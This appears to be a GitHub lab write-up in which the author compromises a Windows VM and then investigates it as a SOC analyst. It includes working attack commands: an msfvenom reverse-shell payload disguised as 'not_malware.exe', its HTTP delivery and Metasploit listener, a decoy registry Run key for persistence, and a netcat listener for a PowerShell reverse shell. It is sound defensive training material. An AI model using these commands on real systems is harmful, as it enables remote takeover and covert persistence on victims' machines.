effiong-okon/endpoint-malware-investigation

# Malware Compromise & Incident Response on Windows Endpoint **Lab Type:** Offensive + Defensive Endpoint Security **Role Simulated:** Red Team (Attacker) → Blue Team (SOC Analyst) **Environment:** Ubuntu 22.04 VM (Attacker) | Windows 11 VM (Victim) | VirtualBox **Tools Used:** Metasploit, Meterpreter, Netcat, TCPView, Process Explorer, WMIC, Tasklist, Registry Editor, VirusTotal, PowerShell ## Overview This lab simulates a real endpoint compromise from both sides of the attack. **Phase 1 (Red Team):** I generated a reverse TCP payload using msfvenom, named it **```not_malware.exe```**, and hosted it on a Python HTTP server on the Ubuntu VM. Once executed on the Windows machine, a live Meterpreter session opened back on the attacker machine. I then wrote a registry Run key entry named **```SystemUpdateHelper```** pointing back to not_malware.exe, rebooted the Windows VM, and the session reopened automatically without any user interaction. Persistence confirmed. **Phase 2 (Blue Team):** Switching to the defender role and working only from native Windows tools, I investigated the compromise starting with **```net view, netstat -abon, and TCPView```** to identify the C2 connection, then **```tasklist and WMIC```** to trace the malicious process and its parent. Went deeper with **```Process Explorer and VirusTotal```**. I performed Eradication process in three clean steps. Process killed with **```taskkill```** , the Run key entry removed with **```reg delete```** , and the file wiped with **```del```**. **Phase 3 (Extension):** I used a fileless PowerShell reverse shell as an alternative attack vector and detected it through command line analysis and base64 decoding. ## Environment Setup | Machine | OS | Role | IP | |---|---|---|---| | Ubuntu VM | Ubuntu 22.04 | Attacker / C2 Server | 192.168.100.39 | | Windows VM | Windows 11 | Victim Endpoint | 192.168.100.42 | **Requirements:** - VirtualBox installed on host - Both VMs set to Bridged Adapter (same physical network interface) - Windows Defender disabled on Windows VM - Metasploit Framework installed on Ubuntu ## PHASE 1: OFFENSIVE/ATTACK SIMULATION ### Step 1: Generate the Malware Payload mkdir ~/malware && cd ~/malware msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.100.39 LPORT=4444 -f exe -o not_malware.exe   ### Step 2: Host and Deliver the Payload python3 -m http.server 8000 On Windows, I navigated to `http://192.168.100.39:8000` and downloaded `not_malware.exe`.    ### Step 3: Start the Metasploit Listener msfconsole use exploit/multi/handler set PAYLOAD windows/meterpreter/reverse_tcp set LHOST 192.168.100.39 set LPORT 4444 run  ### Step 4: Execute the Payload and Establish Access I double-clicked **```not_malware.exe```** on the Windows VM. No window, no prompt, nothing visible, but on the Ubuntu machine, the Meterpreter session opened instantly. sysinfo getuid **Compromised machine confirmed:** - Computer: DESKTOP-GACUCML - OS: Windows 10 22H2+ (Build 19045) - Architecture: x64 - User: DESKTOP-GACUCML\Effizy  ### Step 5: Deploy Registry Persistence From the Meterpreter session, I wrote a registry Run key named **```SystemUpdateHelper```**, designed to blend in as a legitimate system entry so that **```not_malware.exe```** would fire automatically every time the machine booted Verified from Meterpreter: reg queryval -k HKCU\Software\Microsoft\Windows\CurrentVersion\Run -v SystemUpdateHelper   ### Step 6: Persistence Survives Reboot I rebooted the Windows VM and restarted the listener on Ubuntu. The moment I logged in as the user, the **```not_malware.exe```** fired on its own, and the session came back up automatically. Persistence confirmed: [*] Meterpreter session 2 opened (192.168.100.39:4444 -> 192.168.100.42:49702)  ## PHASE 2: DEFENSIVE/SOC INVESTIGATION Working entirely from a fresh Windows CMD (Administrator). No prior knowledge assumed. ### Step 1: Checking for Shared Resources net view \\127.0.0.1 net share net session **Findings:** Only default Windows shares present (C$, IPC$, ADMIN$). No suspicious shares. No active inbound sessions at this point.  ### Step 2: Identifying the C2 Connection netstat -abon netstat -abon | findstr "ESTABLISHED" Running netstat -abon and filtering for established connections immediately surfaced the suspicious entry, **```victim 192.168.100.42:49702 calling out to 192.168.100.39:4444```**, state ESTABLISHED, owned by PID 6748, process not_malware.exe. That was the C2 connection **Malicious connection identified:** | Field | Value | |---|---| | Victim IP:Port | 192.168.100.42:49702 | | Attacker IP:Port | 192.168.100.39:4444 | | State | ESTABLISHED | | PID | 6748 | | Process | not_malware.exe |  ### Step 3: Visualising with TCPView TCPView made it obvious **```not_malware.exe ```** sitting there with an **```ESTABLISHED ```** connection to **```192.168.100.39:4444, PID 6748,```** and a create time of **```5/28/2026 7:49:51 AM```**   ### Step 4: Process Analysis with Tasklist tasklist /FI "PID eq 6748" /V tasklist /FI "PID eq 5352" /M   **Process findings:** | Field | Value | |---|---| | Image Name | not_malware.exe | | PID | 6748 | | Memory | 8,032 K | | Status | Unknown | | Username | DESKTOP-GACUCML\Effizy | | Window Title | N/A | Querying **```PID 6748 with tasklist /V```** confirmed **```not_malware.exe```** running under **```DESKTOP-GACUCML\Effizy,```** consuming **```8,032K```** memory with a window title of N/A, no visible window. The **```/M```** flag on **```PID 5352```** listed the loaded DLLs: **```ntdll.dll, wow64.dll, wow64win.dll, and wow64cpu.dll```**,all legitimate Windows libraries, nothing exotic injected." ### Step 5: Deep Analysis with WMIC wmic process where processid=1032 get name, parentprocessid, processid, commandline wmic process where processid=4648 get name, parentprocessid, processid   **Key findings:** | Field | Value | |---|---| | Name | not_malware.exe | | ProcessId | 1032 | | ParentProcessId | 4648 | | CommandLine | C:\Users\Effizy\Downloads\not_malware.exe | **Parent process confirmed:** explorer.exe (PID 4648, parent 4604) This means the victim double-clicked the file in Windows Explorer, classic user-executed malware delivery. ### Step 6: Process Explorer Analysis    Process Explorer (Sysinternals) provides visual confirmation and integrates VirusTotal. - Process tree shows not_malware.exe under explorer.exe - Image tab: path, start time, auto start location (HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SystemUpdateHelper) - TCP/IP tab: connection to 192.168.100.39:4444 ESTABLISHED - Strings tab: embedded text including "This program cannot be run in DOS mode" and network-related strings **VirusTotal result:** 46 / 71 vendors flagged as malicious Trojan / Backdoor ### Step 7: Manual Hash and VirusTotal Check **SHA256:** `0ED6444D000E46C540BE327D45609AA163E5D0C6E0E0B6E3F5510D903AFD0CA8`   VirusTotal: 46/71 detections, Popular threat label: **Trojan.Metasploit** Tags: trojan, backdoor, metasploit ### Step 8: Registry Persistence Investigation reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run   **Suspicious entry found:** SystemUpdateHelper REG_SZ C:\Users\Effizy\Downloads\not_malware.exe This entry was not in the baseline. It is not a legitimate Windows or application entry. It points directly to the malware file. ### Step 9: Eradication **Kill the process:** taskkill /PID 2772 /F tasklist /FI "PID eq 2772"  Result: No tasks running, process confirmed dead. **Remove persistence:** reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v SystemUpdateHelper /f reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run  Result: SystemUpdateHelper no longer listed. **Delete the file:**  Result: not_malware.exe no longer present. ### Step 10: Final Verification netstat -abon | findstr "4444"  **Result:** No output. The C2 connection is gone. The machine is clean. ## PHASE 3: POWERSHELL REVERSE SHELL (FILELESS VARIANT) To contrast with the exe-based attack in Phase 1, I demonstrated a fileless technique, a base64-encoded PowerShell reverse shell executed entirely in memory. No file written to disk, no executable to scan or delete. **Listener on Ubuntu:** nc -lvp 4545  **Detection on Windows:** netstat -abon  powershell.exe showing ESTABLISHED connection to **```192.168.100.39:4545 (PID 6732).```** **WMIC commandline extraction:** wmic process where processid=6732 get name,parentprocessid,processid,commandline  The commandline shows a long Base64-encoded PowerShell string. **Decoded on Ubuntu:** echo "BASE64_STRING" | base64 -d  Decoded output reveals the attacker **```IP (192.168.100.39) and port (4545)```** hardcoded in the script. ## IOC Summary | Indicator | Type | Value | |---|---|---| | not_malware.exe | File | C:\Users\Effizy\Downloads\not_malware.exe | | SHA256 | Hash | 0ED6444D000E46C540BE327D45609AA163E5D0C6E0E0B6E3F5510D903AFD0CA8 | | C2 Server | IP | 192.168.100.39 | | C2 Port | Port | 4444 | | Persistence Key | Registry | HKCU\Software\Microsoft\Windows\CurrentVersion\Run\SystemUpdateHelper | | PowerShell Port | Port | 4545 | | VirusTotal | Detection | 46/71: Trojan.Metasploit | ## MITRE ATT&CK Mapping | Technique ID | Name | |---|---| | T1059.001 | Command and Scripting Interpreter: PowerShell | | T1071.001 | Application Layer Protocol: Web Protocols (HTTP delivery) | | T1547.001 | Boot or Logon Autostart Execution: Registry Run Keys | | T1049 | System Network Connections Discovery (netstat) | | T1057 | Process Discovery (tasklist, WMIC) | | T1012 | Query Registry | | T1112 | Modify Registry | | T1070.004 | Indicator Removal: File Deletion | ## Tools Used | Tool | Type | Purpose | |---|---|---| | Metasploit/msfvenom | Offensive | Payload generation and C2 | | Python HTTP Server | Offensive | Malware delivery | | Netcat | Offensive | PowerShell shell listener | | netstat | Native Windows | Network connection analysis | | net view/share/session | Native Windows | Shared resource enumeration | | tasklist | Native Windows | Process listing and DLL analysis | | WMIC | Native Windows | Deep process and commandline analysis | | TCPView | Sysinternals | Visual network connection analysis | | Process Explorer | Sysinternals | Process tree and VirusTotal integration | | Registry Editor / reg | Native Windows | Persistence investigation | | PowerShell Get-FileHash | Native Windows | File hashing for threat intelligence | | VirusTotal | Threat Intel | File and IP reputation | ## Key Takeaways - Every malware infection leaves traces across four areas: processes, network, files, and registry. Checking all four is non-negotiable. - netstat must be run while the malware is active; it shows live connections, not a log. - Parent process relationships reveal how malware was launched and help reconstruct the attack chain. - Registry Run keys are one of the most common persistence mechanisms and are easy to detect with a one-line query. - A PowerShell encoded command looks like gibberish but decodes in seconds and reveals everything. - Eradication requires three steps: kill the process, remove the persistence entry, and delete the file. Missing any one of them leaves the machine vulnerable. *Analyst: Effiong Okon* *linkedin.com/in/okon-effiong/ | github.com/effiong-okon*